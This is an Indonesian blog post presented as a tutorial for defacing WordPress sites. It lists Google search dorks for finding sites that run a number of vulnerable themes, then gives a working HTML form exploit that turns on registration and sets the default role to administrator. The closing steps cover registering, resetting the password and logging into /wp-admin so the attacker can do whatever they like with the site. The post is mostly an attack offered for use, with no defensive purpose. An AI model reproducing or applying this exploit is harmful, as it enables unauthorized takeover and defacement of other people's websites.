Deface Dengan WordPress Add Admin Vulnerability - RasyidMF

Deface Dengan WordPress Add Admin Vulnerability

Hasil gambar untuk wordpress
Kali ini www.rasyidmaulanafajar.blogspot.com akan mengshare tutorial deface !
Saat ini saya akan mengshare Deface dengan WordPress Add Admin Vulnerability
Langsung Saja Mulai


Dork:
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya

Eksploit: (Jadikan HTML filenya)
<form action="http://target.com/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="email kalian">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
Atau Download disini: http://www.mediafire.com/download/cev7457xesy734v/Eksploit.html

Register site:
http://target.com/wp-login.php?action=register

isi Username dan Email kalian . tunggu sampai ada pesan di email
kemudian klik Link ResetPassword yang ada di email tersebut. kemudian isi password kalian.
setelah itu login 
Login Site :
http://target.com/wp-login.php

Kalo dah masuk ke /wp-admin/ ya terserah aja mau diapain tuh web :V

Video :

Thanks To ken7ester.blogspot.co.id



Share this:

Post a Comment

Rules :
1.Komentar yang baik,sopan, dan jelas
2.Jangan spam -__-
3.Jika ada problem dari postingnya, koment :3

 
Copyright © RasyidMF. Designed by OddThemes & Best Wordpress Themes 2018